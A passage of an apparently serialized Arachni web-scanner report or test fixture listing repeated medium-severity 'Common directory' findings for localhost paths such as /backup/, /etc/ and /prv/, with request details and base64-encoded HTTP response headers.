!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/info/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/info/
injected: info
id: info
elem: path
remarks: {}
method: ''
response: info
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/forum/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/forum/
injected: forum
id: forum
elem: path
remarks: {}
method: ''
response: forum
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/source/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/source/
injected: source
id: source
elem: path
remarks: {}
method: ''
response: source
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/inc/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/inc/
injected: inc
id: inc
elem: path
remarks: {}
method: ''
response: inc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/excel/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/excel/
injected: excel
id: excel
elem: path
remarks: {}
method: ''
response: excel
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/etc/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/etc/
injected: etc
id: etc
elem: path
remarks: {}
method: ''
response: etc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/backup/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/backup/
injected: backup
id: backup
elem: path
remarks: {}
method: ''
response: backup
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/prv/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/prv/
injected: prv
id: prv
elem: path
remarks: {}
method: ''
response: prv
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/dat/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/dat/
injected: dat
id: dat
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: dat
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/help/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/help/
injected: help
id: help
elem: path
remarks: {}
method: ''
response: help
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/bak/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/bak/
injected: bak
id: bak
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: bak
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/old/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/old/
injected: old
id: old
elem: path
remarks: {}
method: ''
response: old
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/include/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/include/
injected: include
id: include
elem: path
remarks: {}
method: ''
response: include
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/data/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/data/
injected: data
id: data
elem: path
remarks: {}
method: ''
response: data
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/test/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/test/
injected: test
id: test
elem: path
remarks: {}
method: ''
response: test
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
